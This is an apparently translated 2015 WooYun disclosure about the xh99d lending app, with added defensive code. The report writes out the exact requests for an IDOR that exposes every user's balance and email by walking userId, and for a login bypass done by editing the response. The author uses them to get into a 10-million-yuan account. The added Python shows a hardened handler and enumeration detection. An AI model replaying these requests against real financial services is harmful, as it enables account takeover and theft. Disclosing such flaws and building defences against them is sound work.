
Xinhua Jiujiudai (xh99d): a rather major design flaw (puts the funds of all users at risk)

2015-08-10 18:55

Download the app.

[Image: S50805-152732.jpg]



After a normal login I noticed this endpoint:

Code:
POST /xh99d_api/mobile/account_manage.json HTTP/1.1
Content-Length: 20
Content-Type: application/x-www-form-urlencoded
Host: www.xh99d.com
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip

catalog=1&userId=238





The response is as follows:

Code:
HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Wed, 05 Aug 2015 07:17:50 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 245
Connection: keep-alive
Content-Language: zh-CN

{"code":200,"message":"successful","result":{"allMoney":0.00,"avaiMoney":0.0,"blockMoney":0.0,"incomeMoney":0.00,"payMoney":0.00,"userEmail":"******@163.com","userRealName":""},"resultCode":"200","resultMessage":"Success","success":true}



Simply iterating over the id yields each user's funds, email address and so on. Let's enumerate:




================= Dlove's divider ========================================

That turned up a whole pile of them, and then I wondered: could there be an arbitrary-user login?? Sure enough.



[Image: 2.jpg]



Enter any username and password, and capture the request at the login step!

[Image: 3.jpg]



Change the response to:

Code:
HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Wed, 05 Aug 2015 07:38:01 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 112
Connection: keep-alive
Content-Language: zh-CN

{"code":200,"message":"successful","result":{"emailValidFlag":1,"isOpenAccount":"0","phoneValidFlag":1,"userDocNo":"","userEmail":"dondsda@163.com","userHeadImg":"","userId":630,"userName":"yxtest","userPhone":"1511111199","userRealName":"","userType":1},"resultCode":"200","resultMessage":"{UŸ","success":true}





Only the userId needs to be changed; the other fields are refreshed from the network after login!

Let's pick a userId from the enumeration just now and try a rich one!
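Both weaknesses above come down to one thing: the server lets the client's userId decide whose account is read, instead of deriving identity from a server-side session. The following is an added example (not xh99d's code) that puts the reported behaviour beside a hardened handler; the account and session stores, token names and field values are constructed.

```python
# Added example (not xh99d's code): the account_manage.json handler the report
# describes lets the client's userId select the account. The hardened version
# derives the account from the server-side session instead.
from urllib.parse import parse_qs

# Constructed sample data: accounts keyed by userId (field names follow the
# response shown in the report) and sessions mapping a token to its userId.
ACCOUNTS = {
    238: {"allMoney": 0.00, "avaiMoney": 0.0, "blockMoney": 0.0,
          "userEmail": "user238@example.com"},
    5:   {"allMoney": 10000000.00, "avaiMoney": 57266.36, "blockMoney": 0.0,
          "userEmail": "user5@example.com"},
}
SESSIONS = {"tok-238": 238, "tok-5": 5}

class Forbidden(Exception):
    pass

def vulnerable_account_manage(session_token, body):
    """Mirrors the reported behaviour: whatever userId the body carries is
    looked up directly, and the session token is never consulted, so any
    caller can read any account (IDOR)."""
    user_id = int(parse_qs(body)["userId"][0])
    return ACCOUNTS[user_id]

def hardened_account_manage(session_token, body):
    """Identity comes from the authenticated session; a body userId that
    disagrees with it is rejected rather than honoured."""
    user_id = SESSIONS.get(session_token)
    if user_id is None:
        raise Forbidden("no valid session")
    requested = parse_qs(body).get("userId")
    if requested and int(requested[0]) != user_id:
        # Worth logging: this is exactly the enumeration pattern in the report.
        raise Forbidden("userId does not match the authenticated user")
    return ACCOUNTS[user_id]

def is_denied(handler, session_token, body):
    """Helper for checks: True if the handler refuses the request."""
    try:
        handler(session_token, body)
    except Forbidden:
        return True
    return False
```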



[Image: S50805-152659.jpg]

[Image: S50805-154324.jpg]

[Image: S50805-154417.jpg]

[Image: S50805-154557.jpg]

[Image: S50805-154605.jpg]

[Image: S50805-154728.jpg]





You can see the withdrawable amount, but checking it this way is still too slow, so I found this endpoint, which quickly shows a user's email, total balance and withdrawable balance!

Code:
POST /xh99d_api/mobile/account_manage.json HTTP/1.1
Content-Length: 18
Content-Type: application/x-www-form-urlencoded
Host: www.xh99d.com
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip

catalog=1&userId=5



Likewise, just enumerate the userId.

[Image: 4.jpg]





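Enumeration of this kind leaves a clear trace: one source asking for many distinct userId values in a short time, and requests whose userId is not the session's own user. The following detection logic is an added example (not xh99d's code); the log format, with a `session_user` and `userId` field per request, is a constructed assumption, as are the sample lines.

```python
# Added example (not xh99d's code): spotting the userId walk described in the
# report from application logs. The log format is a constructed assumption: the
# app is assumed to record the session's user and the userId parameter.
from collections import defaultdict
from datetime import datetime, timedelta

ENDPOINT = "/xh99d_api/mobile/account_manage.json"

# Constructed sample log: one user reading their own account, one source
# stepping through userId values within a couple of seconds.
SAMPLE_LOG = """\
2015-08-05T07:17:50Z src=10.0.0.8 session_user=238 path=/xh99d_api/mobile/account_manage.json userId=238
2015-08-05T07:20:01Z src=10.0.0.9 session_user=630 path=/xh99d_api/mobile/account_manage.json userId=1
2015-08-05T07:20:02Z src=10.0.0.9 session_user=630 path=/xh99d_api/mobile/account_manage.json userId=2
2015-08-05T07:20:02Z src=10.0.0.9 session_user=630 path=/xh99d_api/mobile/account_manage.json userId=3
2015-08-05T07:20:03Z src=10.0.0.9 session_user=630 path=/xh99d_api/mobile/account_manage.json userId=4
2015-08-05T07:20:03Z src=10.0.0.9 session_user=630 path=/xh99d_api/mobile/account_manage.json userId=5
"""

def parse_line(line):
    """key=value fields after an ISO-8601 timestamp."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec

def find_enumeration(log_text, window=timedelta(minutes=5), threshold=3):
    """Return (flagged, cross_account): sources that requested more than
    `threshold` distinct userIds inside `window`, and every single request
    whose userId is not the session's own user (one IDOR read is enough)."""
    by_src = defaultdict(list)
    cross_account = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec["path"] != ENDPOINT:
            continue
        if rec["userId"] != rec["session_user"]:
            cross_account.append((rec["src"], rec["session_user"], rec["userId"]))
        by_src[rec["src"]].append((rec["ts"], rec["userId"]))
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ids = {uid for t, uid in events[i:] if t - t0 <= window}
            if len(ids) > threshold:
                flagged[src] = ids
                break
    return flagged, cross_account
```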

This time the target is locked in: straight for the rich one!

[Image: 5.jpg]



This one with 10 million will do; let's try logging in!



[Image: 1.jpg]



=======================

I did not click Confirm; I would rather not have anyone come round to "check the water meter"!!

=======================

Proof of vulnerability:

Fix:

You surely know.

Source: www.wooyun.org/bugs/wooyun-2015-0131872
